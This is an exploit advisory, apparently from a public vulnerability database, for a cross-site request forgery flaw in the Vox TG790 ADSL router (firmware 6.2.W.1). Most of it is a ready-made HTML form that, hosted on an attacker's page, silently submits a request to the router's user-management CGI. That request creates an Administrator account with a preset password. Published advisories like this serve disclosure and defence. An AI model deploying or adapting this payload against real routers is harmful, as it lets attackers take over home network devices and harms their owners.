Vox TG790 ADSL Router Cross-Site Request Forgery (Add Admin)

2018.08.24
Credit: Cakes
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A

# Description
# The user-management CGI (/cgi/b/users/cfg/usraccedit/) accepts the
# account-add POST without any anti-CSRF token, so a page under an attacker's
# control can submit it in the context of an already authenticated session.
# Due to this improper session management, low-privilege users are able to
# create administrator accounts through a crafted POST request.

# PoC
# Host the form below on an attacker-controlled page; replace TARGET with the
# router's address and fill in the account name before submitting.
<html>
<form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST">
  <input type="hidden" name="0" id="0" value="10">
  <input type="hidden" name="1" id="1" value="usrAccApply">
  <input type="hidden" name="34" id="34" value="LulzCakes">
  <input type="hidden" name="36" id="36" value="1">
  <!-- field 33: name of the account to create -->
  <input type="text" name="33" id="33" placeholder="Account Name">
  <br />
  <!-- field 31: account type, pre-set to Administrator -->
  <input type="text" name="31" id="31" value="Administrator">
  <br />
  <input type="submit" value="W00ts">
</form>
</html>


Copyright 2019, cxsecurity.com